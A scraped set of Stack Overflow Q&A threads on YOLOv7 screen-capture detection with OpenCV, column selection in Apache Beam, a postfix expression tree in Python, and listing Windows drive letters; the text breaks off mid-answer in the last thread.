What I know I have already trained a custom model using yolov7-tiny I am now trying to use it for object detection on screen The script I have: import mss import numpy as np import cv2 import time import keyboard import torch from hubconf import custom model = custom(path_or_model='yolov7-tiny-custom.pt') with mss.mss() as sct: monitor = {'top': 30, 'left': 0, 'width': 1152, 'height': 864} while True: t = time.time() img = np.array(sct.grab(monitor)) results = model(img) cv2.imshow('s', np.squeeze(results.render())) print('fps: {}'.format(1 / (time.time() - t))) cv2.waitKey(1) if keyboard.is_pressed('q'): break cv2.destroyAllWindows() The problem I know that everything works in that script, however when it finally detects an object, it wants to draw a rectangle on screen. I receive the following error: Traceback (most recent call last): File "c:\Users\ahmed\Desktop\PC\Repos\yolov7-custom\yolov7-custom\aimbot.py", line 20, in <module> cv2.imshow('s', np.squeeze(results.render())) File "c:\Users\ahmed\Desktop\PC\Repos\yolov7-custom\yolov7-custom\models\common.py", line 990, in render self.display(render=True) # render results File "c:\Users\ahmed\Desktop\PC\Repos\yolov7-custom\yolov7-custom\models\common.py", line 964, in display plot_one_box(box, img, label=label, color=colors[int(cls) % 10]) File "c:\Users\ahmed\Desktop\PC\Repos\yolov7-custom\yolov7-custom\utils\plots.py", line 62, in plot_one_box cv2.rectangle(img, c1, c2, color, thickness=tl, lineType=cv2.LINE_AA) cv2.error: OpenCV(4.6.0) :-1: error: (-5:Bad argument) in function 'rectangle' > Overload resolution failed: > - Layout of the output array img is incompatible with cv::Mat > - Expected Ptr<cv::UMat> for argument 'img' > - argument for rectangle() given by name ('thickness') and position (4) > - argument for rectangle() given by name ('thickness') and position (4) Summary I'm not too sure whats going on here but I believe that when I take the screenshot, I convert it to an array and apply my model. When it wants to draw a rectangle, its unable to do so because the output array img is incompatible with OpenCV matrix. How can I fix that?
[ "I tried to reproduce your issue and combined your code with an available yolo-demo, but I couldn't find any issue that would return an error message like that in your question. You can check it in your environment:\nimport mss\nimport numpy as np\nimport cv2\nimport torch\nimport time\n\n\nmodel = torch.hub.load('ultralytics/yolov5', 'yolov5s')\n\nwith mss.mss() as sct:\n monitor = {'top': 50, 'left': 50, 'width': 600, 'height': 400}\n\n while True:\n t = time.time()\n\n img = np.array(sct.grab(monitor))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n results = model(img)\n results.render()\n out = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n cv2.imshow('s', out)\n\n print('fps: {}'.format(1 / (time.time() - t)))\n\n if cv2.waitKey(1) == 27:\n break\n\ncv2.destroyAllWindows()\n\nOutput:\n\n" ]
[ 1 ]
[]
[]
[ "object_detection", "opencv", "python", "yolo" ]
stackoverflow_0074590208_object_detection_opencv_python_yolo.txt
Q: Select some columns from PCollection (Apache Beam, Python) I have the following PCollection: And I want to select only 2 columns from that PCollection. I tried to do: def cut_data(data): return data[["WebSpeedRef", "WebSpeedAct"]] data_min = data_json | 'min' >> beam.Map(cut_data) but got an error. What is the simplest way to accomplish this? A: You could do this: desired_columns = ( dataset | beam.Map(lambda x: [x["column1"], x["column2"]]) )
Select some columns from PCollection (Apache Beam, Python)
I have the following PCollection: And I want to select only 2 columns from that PCollection. I tried to do: def cut_data(data): return data[["WebSpeedRef", "WebSpeedAct"]] data_min = data_json | 'min' >> beam.Map(cut_data) but got an error. What is the simplest way to accomplish this?
[ "You could do this:\ndisired_columns = (\n dataset\n | beam.Map(lambda x: [x[\"column1\"], x[\"column2\"]])\n)\n\n" ]
[ 0 ]
[]
[]
[ "apache_beam", "python" ]
stackoverflow_0061873428_apache_beam_python.txt
Q: How to fix 'NoneType' has no attribute 'key', when trying to compare a key value to a string I am writing a program where the user inputs a postfix expression and it outputs the answer. Current I am stuck when Using my 'evaluate' function within my for loop. Inside my For loop Main.py: else: # Debug Code print('{}: Else'.format(i)) print('{}: Length'.format(len(stack))) Node.right = stack.pop() Node.left = stack.pop() Node = TreeNode(str(i)) stack.push(str(i)) # Debug Code print('{}: Right Key'.format(Node.right)) print('{}: Left Key'.format(Node.left)) print('{}: Node Key'.format(Node.key)) print('{}: Node Key Type'.format(type(Node.key))) Node = evaluate(Node) stack.push(int(Node)) I am getting the error below: Traceback (most recent call last): File "c:\Users\dpr48\main.py", line 49, in <module> Node = evaluate(Node) File "c:\Users\dpr48\main.py", line 10, in evaluate return evaluate(node.left) + evaluate(node.right) File "c:\Users\dpr48\main.py", line 9, in evaluate if node.key == '+': AttributeError: 'NoneType' object has no attribute 'key' So my question is why is it not using the 'TreeNode' class to get the key value? As well as the line of code that should define the 'Node.left' as the 'stack.pop()' value and 'Node.right' as the 'stack.pop()' value ends up not changing either of them and leaves them as None, as found in the 'Debug Code' that I have implemented to see what the program is doing interenally. Provided each class used below: Main.py from Stack import Stack from TreeNode import TreeNode def evaluate(node): if node.key == '+': return evaluate(node.left) + evaluate(node.right) elif node.key == '-': return evaluate(node.left) - evaluate(node.right) elif node.key == '*': return evaluate(node.left) * evaluate(node.right) elif node.key == '/': return evaluate(node.left) / evaluate(node.right) else: return node.key stack = Stack() exp = "23+" list = [*exp] for i in list: if i.isdigit() is True: # Debug Code print('{}: True'.format(i)) Node = TreeNode(int(i)) stack.push(int(i)) else: # Debug Code print('{}: Else'.format(i)) print('{}: Length'.format(len(stack))) Node.right = stack.pop() Node.left = stack.pop() Node = TreeNode(str(i)) stack.push(str(i)) # Debug Code print('{}: Right Key'.format(Node.right)) print('{}: Left Key'.format(Node.left)) print('{}: Node Key'.format(Node.key)) print('{}: Node Key Type'.format(type(Node.key))) Node = evaluate(Node) stack.push(int(Node)) print(evaluate(stack.node)) Stack.py from Node import Node from LinkedList import LinkedList class Stack: def __init__(self): self.list = LinkedList() def push(self, new_item): # Create a new node to hold the item new_node = Node(new_item) # Insert the node as the list head (top of stack) self.list.prepend(new_node) def pop(self): # Copy data from list's head node (stack's top node) popped_item = self.list.head.data # Remove list head self.list.remove_after(None) # Return the popped item return popped_item def __len__(self): node = self.list.head # Start at head of stack to count until stack returns Null count = 0 while node != None: node = node.next count+=1 return count # Returning length of stack LinkedList.py class LinkedList: def __init__(self): self.head = None self.tail = None def append(self, new_node): if self.head == None: self.head = new_node self.tail = new_node else: self.tail.next = new_node self.tail = new_node def prepend(self, new_node): if self.head == None: self.head = new_node self.tail = new_node else: new_node.next = self.head self.head = new_node def insert_after(self, 
current_node, new_node): if self.head == None: self.head = new_node self.tail = new_node elif current_node is self.tail: self.tail.next = new_node self.tail = new_node else: new_node.next = current_node.next current_node.next = new_node def remove_after(self, current_node): # Special case, remove head if (current_node == None) and (self.head != None): succeeding_node = self.head.next self.head = succeeding_node if succeeding_node == None: # Remove last item self.tail = None elif current_node.next != None: succeeding_node = current_node.next.next current_node.next = succeeding_node if succeeding_node == None: # Remove tail self.tail = current_node Node.py class Node: def __init__(self, initial_data): self.data = initial_data self.next = None TreeNode.py class TreeNode: # Constructor assigns the given key, with left and right # children assigned with None. def __init__(self, key): self.key = key self.left = None self.right = None A: There are several issues: Node is the name of a class, yet you use the same name for a TreeNode instance, shadowing the class name. This is not the main problem, but certainly not advised. Related: Don't use PascalCase for instances, but camelCase. So node, not Node. You assign to Node.right when you have not yet defined Node yet, which happens later with Node = TreeNode(str(i)). You should first assign to Node (well, better node) and only then assign to its attributes. With Node.right = stack.pop() you clearly expect the stack to contain TreeNode instances, but with stack.push(str(i)) you push strings. That will lead to the problems you describe. The stack should not be populated with strings, but with TreeNode objects. At the end of the else block you call evaluate, and then push that result value to the stack. This is wrong and should be removed. The evaluation should only happen when you have completed the tree, and it should not involve the stack. The stack has a role in building the tree, not in evaluating it. The final print line makes an access to stack.node, but stack has no node attribute. You'll want to pop the top item from the stack, which (if the input syntax was correct) should only have 1 node left on it, representing the root of the tree. Not a problem, but i is guaranteed to be a string (with length 1), so there is no need to call str on it. Here is the corrected code: for i in list: if i.isdigit() is True: node = TreeNode(int(i)) # lowercase name stack.push(node) # don't push string, but object else: node = TreeNode(i) # First create the node node.right = stack.pop() # Then assign to its attributes node.left = stack.pop() stack.push(node) # don't push string # Don't evaluate here, nor push anything else to the stack print(evaluate(stack.pop()))
How to fix 'NoneType' has no attribute 'key', when trying to compare a key value to a string
I am writing a program where the user inputs a postfix expression and it outputs the answer. Current I am stuck when Using my 'evaluate' function within my for loop. Inside my For loop Main.py: else: # Debug Code print('{}: Else'.format(i)) print('{}: Length'.format(len(stack))) Node.right = stack.pop() Node.left = stack.pop() Node = TreeNode(str(i)) stack.push(str(i)) # Debug Code print('{}: Right Key'.format(Node.right)) print('{}: Left Key'.format(Node.left)) print('{}: Node Key'.format(Node.key)) print('{}: Node Key Type'.format(type(Node.key))) Node = evaluate(Node) stack.push(int(Node)) I am getting the error below: Traceback (most recent call last): File "c:\Users\dpr48\main.py", line 49, in <module> Node = evaluate(Node) File "c:\Users\dpr48\main.py", line 10, in evaluate return evaluate(node.left) + evaluate(node.right) File "c:\Users\dpr48\main.py", line 9, in evaluate if node.key == '+': AttributeError: 'NoneType' object has no attribute 'key' So my question is why is it not using the 'TreeNode' class to get the key value? As well as the line of code that should define the 'Node.left' as the 'stack.pop()' value and 'Node.right' as the 'stack.pop()' value ends up not changing either of them and leaves them as None, as found in the 'Debug Code' that I have implemented to see what the program is doing interenally. Provided each class used below: Main.py from Stack import Stack from TreeNode import TreeNode def evaluate(node): if node.key == '+': return evaluate(node.left) + evaluate(node.right) elif node.key == '-': return evaluate(node.left) - evaluate(node.right) elif node.key == '*': return evaluate(node.left) * evaluate(node.right) elif node.key == '/': return evaluate(node.left) / evaluate(node.right) else: return node.key stack = Stack() exp = "23+" list = [*exp] for i in list: if i.isdigit() is True: # Debug Code print('{}: True'.format(i)) Node = TreeNode(int(i)) stack.push(int(i)) else: # Debug Code print('{}: Else'.format(i)) print('{}: Length'.format(len(stack))) Node.right = stack.pop() Node.left = stack.pop() Node = TreeNode(str(i)) stack.push(str(i)) # Debug Code print('{}: Right Key'.format(Node.right)) print('{}: Left Key'.format(Node.left)) print('{}: Node Key'.format(Node.key)) print('{}: Node Key Type'.format(type(Node.key))) Node = evaluate(Node) stack.push(int(Node)) print(evaluate(stack.node)) Stack.py from Node import Node from LinkedList import LinkedList class Stack: def __init__(self): self.list = LinkedList() def push(self, new_item): # Create a new node to hold the item new_node = Node(new_item) # Insert the node as the list head (top of stack) self.list.prepend(new_node) def pop(self): # Copy data from list's head node (stack's top node) popped_item = self.list.head.data # Remove list head self.list.remove_after(None) # Return the popped item return popped_item def __len__(self): node = self.list.head # Start at head of stack to count until stack returns Null count = 0 while node != None: node = node.next count+=1 return count # Returning length of stack LinkedList.py class LinkedList: def __init__(self): self.head = None self.tail = None def append(self, new_node): if self.head == None: self.head = new_node self.tail = new_node else: self.tail.next = new_node self.tail = new_node def prepend(self, new_node): if self.head == None: self.head = new_node self.tail = new_node else: new_node.next = self.head self.head = new_node def insert_after(self, current_node, new_node): if self.head == None: self.head = new_node self.tail = new_node elif current_node 
is self.tail: self.tail.next = new_node self.tail = new_node else: new_node.next = current_node.next current_node.next = new_node def remove_after(self, current_node): # Special case, remove head if (current_node == None) and (self.head != None): succeeding_node = self.head.next self.head = succeeding_node if succeeding_node == None: # Remove last item self.tail = None elif current_node.next != None: succeeding_node = current_node.next.next current_node.next = succeeding_node if succeeding_node == None: # Remove tail self.tail = current_node Node.py class Node: def __init__(self, initial_data): self.data = initial_data self.next = None TreeNode.py class TreeNode: # Constructor assigns the given key, with left and right # children assigned with None. def __init__(self, key): self.key = key self.left = None self.right = None
[ "There are several issues:\n\nNode is the name of a class, yet you use the same name for a TreeNode instance, shadowing the class name. This is not the main problem, but certainly not advised. Related: Don't use PascalCase for instances, but camelCase. So node, not Node.\n\nYou assign to Node.right when you have not yet defined Node yet, which happens later with Node = TreeNode(str(i)). You should first assign to Node (well, better node) and only then assign to its attributes.\n\nWith Node.right = stack.pop() you clearly expect the stack to contain TreeNode instances, but with stack.push(str(i)) you push strings. That will lead to the problems you describe. The stack should not be populated with strings, but with TreeNode objects.\n\nAt the end of the else block you call evaluate, and then push that result value to the stack. This is wrong and should be removed. The evaluation should only happen when you have completed the tree, and it should not involve the stack. The stack has a role in building the tree, not in evaluating it.\n\nThe final print line makes an access to stack.node, but stack has no node attribute. You'll want to pop the top item from the stack, which (if the input syntax was correct) should only have 1 node left on it, representing the root of the tree.\n\nNot a problem, but i is guaranteed to be a string (with length 1), so there is no need to call str on it.\n\n\nHere is the corrected code:\nfor i in list:\n if i.isdigit() is True:\n node = TreeNode(int(i)) # lowercase name\n stack.push(node) # don't push string, but object\n else:\n node = TreeNode(i) # First create the node\n node.right = stack.pop() # Then assign to its attributes\n node.left = stack.pop()\n stack.push(node) # don't push string\n # Don't evaluate here, nor push anything else to the stack\n\n\nprint(evaluate(stack.pop()))\n\n" ]
[ 1 ]
[]
[]
[ "linked_list", "nodes", "postfix_notation", "python", "stack" ]
stackoverflow_0074593287_linked_list_nodes_postfix_notation_python_stack.txt
Q: Is there a way to list all the available Windows' drives? Is there a way in Python to list all the currently in-use drive letters in a Windows system? (My Google-fu seems to have let me down on this one) A C++ equivalent: Enumerating all available drive letters in Windows A: import win32api drives = win32api.GetLogicalDriveStrings() drives = drives.split('\000')[:-1] print drives Adapted from: http://www.faqts.com/knowledge_base/view.phtml/aid/4670 A: Without using any external libraries, if that matters to you: import string from ctypes import windll def get_drives(): drives = [] bitmask = windll.kernel32.GetLogicalDrives() for letter in string.uppercase: if bitmask & 1: drives.append(letter) bitmask >>= 1 return drives if __name__ == '__main__': print get_drives() # On my PC, this prints ['A', 'C', 'D', 'F', 'H'] A: Found this solution on Google, slightly modified from original. Seem pretty pythonic and does not need any "exotic" imports import os, string available_drives = ['%s:' % d for d in string.ascii_uppercase if os.path.exists('%s:' % d)] A: I wrote this piece of code: import os drives = [ chr(x) + ":" for x in range(65,91) if os.path.exists(chr(x) + ":") ] It's based on @Barmaley's answer, but has the advantage of not using the string module, in case you don't want to use it. It also works on my system, unlike @SingleNegationElimination's answer. A: Those look like better answers. Here's my hackish cruft import os, re re.findall(r"[A-Z]+:.*$",os.popen("mountvol /").read(),re.MULTILINE) Riffing a bit on RichieHindle's answer; it's not really better, but you can get windows to do the work of coming up with actual letters of the alphabet >>> import ctypes >>> buff_size = ctypes.windll.kernel32.GetLogicalDriveStringsW(0,None) >>> buff = ctypes.create_string_buffer(buff_size*2) >>> ctypes.windll.kernel32.GetLogicalDriveStringsW(buff_size,buff) 8 >>> filter(None, buff.raw.decode('utf-16-le').split(u'\0')) [u'C:\\', u'D:\\'] A: The Microsoft Script Repository includes this recipe which might help. I don't have a windows machine to test it, though, so I'm not sure if you want "Name", "System Name", "Volume Name", or maybe something else. import win32com.client strComputer = "." 
objWMIService = win32com.client.Dispatch("WbemScripting.SWbemLocator") objSWbemServices = objWMIService.ConnectServer(strComputer,"root\cimv2") colItems = objSWbemServices.ExecQuery("Select * from Win32_LogicalDisk") for objItem in colItems: print "Access: ", objItem.Access print "Availability: ", objItem.Availability print "Block Size: ", objItem.BlockSize print "Caption: ", objItem.Caption print "Compressed: ", objItem.Compressed print "Config Manager Error Code: ", objItem.ConfigManagerErrorCode print "Config Manager User Config: ", objItem.ConfigManagerUserConfig print "Creation Class Name: ", objItem.CreationClassName print "Description: ", objItem.Description print "Device ID: ", objItem.DeviceID print "Drive Type: ", objItem.DriveType print "Error Cleared: ", objItem.ErrorCleared print "Error Description: ", objItem.ErrorDescription print "Error Methodology: ", objItem.ErrorMethodology print "File System: ", objItem.FileSystem print "Free Space: ", objItem.FreeSpace print "Install Date: ", objItem.InstallDate print "Last Error Code: ", objItem.LastErrorCode print "Maximum Component Length: ", objItem.MaximumComponentLength print "Media Type: ", objItem.MediaType print "Name: ", objItem.Name print "Number Of Blocks: ", objItem.NumberOfBlocks print "PNP Device ID: ", objItem.PNPDeviceID z = objItem.PowerManagementCapabilities if z is None: a = 1 else: for x in z: print "Power Management Capabilities: ", x print "Power Management Supported: ", objItem.PowerManagementSupported print "Provider Name: ", objItem.ProviderName print "Purpose: ", objItem.Purpose print "Quotas Disabled: ", objItem.QuotasDisabled print "Quotas Incomplete: ", objItem.QuotasIncomplete print "Quotas Rebuilding: ", objItem.QuotasRebuilding print "Size: ", objItem.Size print "Status: ", objItem.Status print "Status Info: ", objItem.StatusInfo print "Supports Disk Quotas: ", objItem.SupportsDiskQuotas print "Supports File-Based Compression: ", objItem.SupportsFileBasedCompression print "System Creation Class Name: ", objItem.SystemCreationClassName print "System Name: ", objItem.SystemName print "Volume Dirty: ", objItem.VolumeDirty print "Volume Name: ", objItem.VolumeName print "Volume Serial Number: ", objItem.VolumeSerialNumber A: Here is another great solution if you want to list only drives on your disc and not mapped network drives. If you want to filter by different attributes just print drps. import psutil drps = psutil.disk_partitions() drives = [dp.device for dp in drps if dp.fstype == 'NTFS'] A: On Windows you can do a os.popen import os print os.popen("fsutil fsinfo drives").readlines() A: More optimal solution based on @RichieHindle def get_drives(): drives = [] bitmask = windll.kernel32.GetLogicalDrives() letter = ord('A') while bitmask > 0: if bitmask & 1: drives.append(chr(letter) + ':\\') bitmask >>= 1 letter += 1 return drives A: here's a simpler version, without installing any additional modules or any functions. Since drive letters can't go beyond A and Z, you can search if there is path available for each alphabet, like below: >>> import os >>> for drive_letter in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ': if os.path.exists(f'{drive_letter}:'): print(f'{drive_letter}:') else: pass the one-liner: >>> import os >>> [f'{d}:' for d in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' if os.path.exists(f'{d}:')] ['C:', 'D:'] A: As part of a similar task I also needed to grab a free drive letter. I decided I wanted the highest available letter. 
I first wrote it out more idiomatically, then crunched it to a 1-liner to see if it still made sense. As awesome as list comprehensions are I love sets for this: unused=set(alphabet)-set(used) instead of having to do unused = [a for a in aphabet if a not in used]. Cool stuff! def get_used_drive_letters(): drives = win32api.GetLogicalDriveStrings() drives = drives.split('\000')[:-1] letters = [d[0] for d in drives] return letters def get_unused_drive_letters(): alphabet = map(chr, range(ord('A'), ord('Z')+1)) used = get_used_drive_letters() unused = list(set(alphabet)-set(used)) return unused def get_highest_unused_drive_letter(): unused = get_unused_drive_letters() highest = list(reversed(sorted(unused)))[0] return highest The one liner: def get_drive(): highest = sorted(list(set(map(chr, range(ord('A'), ord('Z')+1))) - set(win32api.GetLogicalDriveStrings().split(':\\\000')[:-1])))[-1] I also chose the alphabet using map/range/ord/chr over using string since parts of string are deprecated. A: Here's my higher-performance approach (could probably be higher): >>> from string import ascii_uppercase >>> reverse_alphabet = ascii_uppercase[::-1] >>> from ctypes import windll # Windows only >>> GLD = windll.kernel32.GetLogicalDisk >>> drives = ['%s:/'%reverse_alphabet[i] for i,v in enumerate(bin(GLD())[2:]) if v=='1'] Nobody really uses python's performative featurability... Yes, I'm not following Windows standard path conventions ('\\')... In all my years of using python, I've had no problems with '/' anywhere paths are used, and have made it standard in my programs. A: This code will return of list of drivenames and letters, for example: ['Gateway(C:)', 'EOS_DIGITAL(L:)', 'Music Archive(O:)'] It only uses the standard library. It builds on a few ideas I found above. windll.kernel32.GetVolumeInformationW() returns 0 if the disk drive is empty, a CD rom without a disk for example. This code does not list these empty drives. 
These 2 lines capture the letters of all of the drives: bitmask = (bin(windll.kernel32.GetLogicalDrives())[2:])[::-1] # strip off leading 0b and reverse drive_letters = [ascii_uppercase[i] + ':/' for i, v in enumerate(bitmask) if v == '1'] Here is the full routine: from ctypes import windll, create_unicode_buffer, c_wchar_p, sizeof from string import ascii_uppercase def get_win_drive_names(): volumeNameBuffer = create_unicode_buffer(1024) fileSystemNameBuffer = create_unicode_buffer(1024) serial_number = None max_component_length = None file_system_flags = None drive_names = [] # Get the drive letters, then use the letters to get the drive names bitmask = (bin(windll.kernel32.GetLogicalDrives())[2:])[::-1] # strip off leading 0b and reverse drive_letters = [ascii_uppercase[i] + ':/' for i, v in enumerate(bitmask) if v == '1'] for d in drive_letters: rc = windll.kernel32.GetVolumeInformationW(c_wchar_p(d), volumeNameBuffer, sizeof(volumeNameBuffer), serial_number, max_component_length, file_system_flags, fileSystemNameBuffer, sizeof(fileSystemNameBuffer)) if rc: drive_names.append(f'{volumeNameBuffer.value}({d[:2]})') # disk_name(C:) return drive_names A: This will help to find valid drives in Windows OS import os import string drive = string.ascii_uppercase valid_drives = [] for each_drive in drive: if os.path.exists(each_drive+":\\"): print(each_drive) valid_drives.append(each_drive+":\\") print(valid_drives) The output will be C D E ['C:\\','D:\\','E:\\'] A: If you want only the letters for each drive, you can just: from win32.win32api import GetLogicalDriveStrings drives = [drive for drive in GetLogicalDriveStrings()[0]] A: As I don't have win32api installed on my field of notebooks I used this solution using wmic: import subprocess import string #define alphabet alphabet = [] for i in string.ascii_uppercase: alphabet.append(i + ':') #get letters that are mounted somewhere mounted_letters = subprocess.Popen("wmic logicaldisk get name", shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) #erase mounted letters from alphabet in nested loop for line in mounted_letters.stdout.readlines(): if "Name" in line: continue for letter in alphabet: if letter in line: print 'Deleting letter %s from free alphabet %s' % letter alphabet.pop(alphabet.index(letter)) print alphabet alternatively you can get the difference from both lists like this simpler solution (after launching wmic subprocess as mounted_letters): #get output to list mounted_letters_list = [] for line in mounted_letters.stdout.readlines(): if "Name" in line: continue mounted_letters_list.append(line.strip()) rest = list(set(alphabet) - set(mounted_letters_list)) rest.sort() print rest both solutions are similarly fast, yet I guess set list is better for some reason, right?
A: if you don't want to worry about cross platform issues, including those across python platforms such as Pypy, and want something decently performative to be used when drives are updated during runtime: >>> from os.path import exists >>> from sys import platform >>> drives = ''.join( l for l in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' if exists('%s:/'%l) ) if platform=='win32' else '' >>> drives 'CZ' here's my performance test of this code: 4000 iterations; threshold of min + 250ns: __________________________________________________________________________________________________________code___|_______min______|_______max______|_______avg______|_efficiency ⡇⠀⠀⢀⠀⠀⠀⠀⠀⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⣷⣷⣶⣼⣶⣴⣴⣤⣤⣧⣤⣤⣠⣠⣤⣤⣶⣤⣤⣄⣠⣦⣤⣠⣤⣤⣤⣤⣄⣠⣤⣠⣤⣤⣠⣤⣤⣤⣤⣤⣤⣄⣤⣤⣄⣤⣄⣤⣠⣀⣀⣤⣄⣤⢀⣀⢀⣠⣠⣀⣀⣤⣀⣠ drives = ''.join( l for l in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' if exists('%s:/'%l) ) if platform=='win32' else '' | 290.049ns | 1975.975ns | 349.911ns | 82.892% A: List hard drives using command prompt windows in python Similarly, you can do it for Linux with a few changes import os,re regex = r"([^\s]*:)" driver = os.popen("wmic logicaldisk get name").read() print(re.findall(regex, driver)) sample output: ['A:', 'C:', 'D:', 'E:', 'F:', 'G:', 'H:', 'I:', 'J:', 'L:']
Is there a way to list all the available Windows' drives?
Is there a way in Python to list all the currently in-use drive letters in a Windows system? (My Google-fu seems to have let me down on this one) A C++ equivalent: Enumerating all available drive letters in Windows
[ "import win32api\n\ndrives = win32api.GetLogicalDriveStrings()\ndrives = drives.split('\\000')[:-1]\nprint drives\n\nAdapted from:\nhttp://www.faqts.com/knowledge_base/view.phtml/aid/4670\n", "Without using any external libraries, if that matters to you:\nimport string\nfrom ctypes import windll\n\ndef get_drives():\n drives = []\n bitmask = windll.kernel32.GetLogicalDrives()\n for letter in string.uppercase:\n if bitmask & 1:\n drives.append(letter)\n bitmask >>= 1\n\n return drives\n\nif __name__ == '__main__':\n print get_drives() # On my PC, this prints ['A', 'C', 'D', 'F', 'H']\n\n", "Found this solution on Google, slightly modified from original. Seem pretty pythonic and does not need any \"exotic\" imports\nimport os, string\navailable_drives = ['%s:' % d for d in string.ascii_uppercase if os.path.exists('%s:' % d)]\n\n", "I wrote this piece of code:\nimport os\ndrives = [ chr(x) + \":\" for x in range(65,91) if os.path.exists(chr(x) + \":\") ]\n\nIt's based on @Barmaley's answer, but has the advantage of not using the string\nmodule, in case you don't want to use it. It also works on my system, unlike @SingleNegationElimination's answer.\n", "Those look like better answers. Here's my hackish cruft\nimport os, re\nre.findall(r\"[A-Z]+:.*$\",os.popen(\"mountvol /\").read(),re.MULTILINE)\n\nRiffing a bit on RichieHindle's answer; it's not really better, but you can get windows to do the work of coming up with actual letters of the alphabet\n>>> import ctypes\n>>> buff_size = ctypes.windll.kernel32.GetLogicalDriveStringsW(0,None)\n>>> buff = ctypes.create_string_buffer(buff_size*2)\n>>> ctypes.windll.kernel32.GetLogicalDriveStringsW(buff_size,buff)\n8\n>>> filter(None, buff.raw.decode('utf-16-le').split(u'\\0'))\n[u'C:\\\\', u'D:\\\\']\n\n", "The Microsoft Script Repository includes this recipe which might help. 
I don't have a windows machine to test it, though, so I'm not sure if you want \"Name\", \"System Name\", \"Volume Name\", or maybe something else.\nimport win32com.client \nstrComputer = \".\" \nobjWMIService = win32com.client.Dispatch(\"WbemScripting.SWbemLocator\") \nobjSWbemServices = objWMIService.ConnectServer(strComputer,\"root\\cimv2\") \ncolItems = objSWbemServices.ExecQuery(\"Select * from Win32_LogicalDisk\") \nfor objItem in colItems: \n print \"Access: \", objItem.Access \n print \"Availability: \", objItem.Availability \n print \"Block Size: \", objItem.BlockSize \n print \"Caption: \", objItem.Caption \n print \"Compressed: \", objItem.Compressed \n print \"Config Manager Error Code: \", objItem.ConfigManagerErrorCode \n print \"Config Manager User Config: \", objItem.ConfigManagerUserConfig \n print \"Creation Class Name: \", objItem.CreationClassName \n print \"Description: \", objItem.Description \n print \"Device ID: \", objItem.DeviceID \n print \"Drive Type: \", objItem.DriveType \n print \"Error Cleared: \", objItem.ErrorCleared \n print \"Error Description: \", objItem.ErrorDescription \n print \"Error Methodology: \", objItem.ErrorMethodology \n print \"File System: \", objItem.FileSystem \n print \"Free Space: \", objItem.FreeSpace \n print \"Install Date: \", objItem.InstallDate \n print \"Last Error Code: \", objItem.LastErrorCode \n print \"Maximum Component Length: \", objItem.MaximumComponentLength \n print \"Media Type: \", objItem.MediaType \n print \"Name: \", objItem.Name \n print \"Number Of Blocks: \", objItem.NumberOfBlocks \n print \"PNP Device ID: \", objItem.PNPDeviceID \n z = objItem.PowerManagementCapabilities \n if z is None: \n a = 1 \n else: \n for x in z: \n print \"Power Management Capabilities: \", x \n print \"Power Management Supported: \", objItem.PowerManagementSupported \n print \"Provider Name: \", objItem.ProviderName \n print \"Purpose: \", objItem.Purpose \n print \"Quotas Disabled: \", objItem.QuotasDisabled \n print \"Quotas Incomplete: \", objItem.QuotasIncomplete \n print \"Quotas Rebuilding: \", objItem.QuotasRebuilding \n print \"Size: \", objItem.Size \n print \"Status: \", objItem.Status \n print \"Status Info: \", objItem.StatusInfo \n print \"Supports Disk Quotas: \", objItem.SupportsDiskQuotas \n print \"Supports File-Based Compression: \", objItem.SupportsFileBasedCompression \n print \"System Creation Class Name: \", objItem.SystemCreationClassName \n print \"System Name: \", objItem.SystemName \n print \"Volume Dirty: \", objItem.VolumeDirty \n print \"Volume Name: \", objItem.VolumeName \n print \"Volume Serial Number: \", objItem.VolumeSerialNumber \n\n", "Here is another great solution if you want to list only drives on your disc and not mapped network drives. If you want to filter by different attributes just print drps.\nimport psutil\ndrps = psutil.disk_partitions()\ndrives = [dp.device for dp in drps if dp.fstype == 'NTFS']\n\n", "On Windows you can do a os.popen\nimport os\nprint os.popen(\"fsutil fsinfo drives\").readlines()\n\n", "More optimal solution based on @RichieHindle\ndef get_drives():\n drives = []\n bitmask = windll.kernel32.GetLogicalDrives()\n letter = ord('A')\n while bitmask > 0:\n if bitmask & 1:\n drives.append(chr(letter) + ':\\\\')\n bitmask >>= 1\n letter += 1\n\n return drives\n\n", "here's a simpler version, without installing any additional modules or any functions. 
Since drive letters can't go beyond A and Z, you can search if there is path available for each alphabet, like below:\n>>> import os\n>>> for drive_letter in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':\n if os.path.exists(f'{drive_letter}:'):\n print(f'{drive_letter}:')\n else:\n pass\n\nthe one-liner:\n>>> import os\n>>> [f'{d}:' for d in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' if os.path.exists(f'{d}:')]\n['C:', 'D:']\n\n", "As part of a similar task I also needed to grab a free drive letter. I decided I wanted the highest available letter. I first wrote it out more idiomatically, then crunched it to a 1-liner to see if it still made sense. As awesome as list comprehensions are I love sets for this: unused=set(alphabet)-set(used) instead of having to do unused = [a for a in aphabet if a not in used]. Cool stuff!\ndef get_used_drive_letters():\n drives = win32api.GetLogicalDriveStrings()\n drives = drives.split('\\000')[:-1]\n letters = [d[0] for d in drives]\n return letters\n\ndef get_unused_drive_letters():\n alphabet = map(chr, range(ord('A'), ord('Z')+1))\n used = get_used_drive_letters()\n unused = list(set(alphabet)-set(used))\n return unused\n\ndef get_highest_unused_drive_letter():\n unused = get_unused_drive_letters()\n highest = list(reversed(sorted(unused)))[0]\n return highest\n\nThe one liner:\ndef get_drive():\n highest = sorted(list(set(map(chr, range(ord('A'), ord('Z')+1))) -\n set(win32api.GetLogicalDriveStrings().split(':\\\\\\000')[:-1])))[-1]\n\nI also chose the alphabet using map/range/ord/chr over using string since parts of string are deprecated.\n", "Here's my higher-performance approach (could probably be higher):\n>>> from string import ascii_uppercase\n>>> reverse_alphabet = ascii_uppercase[::-1]\n>>> from ctypes import windll # Windows only\n>>> GLD = windll.kernel32.GetLogicalDisk\n>>> drives = ['%s:/'%reverse_alphabet[i] for i,v in enumerate(bin(GLD())[2:]) if v=='1']\n\nNobody really uses python's performative 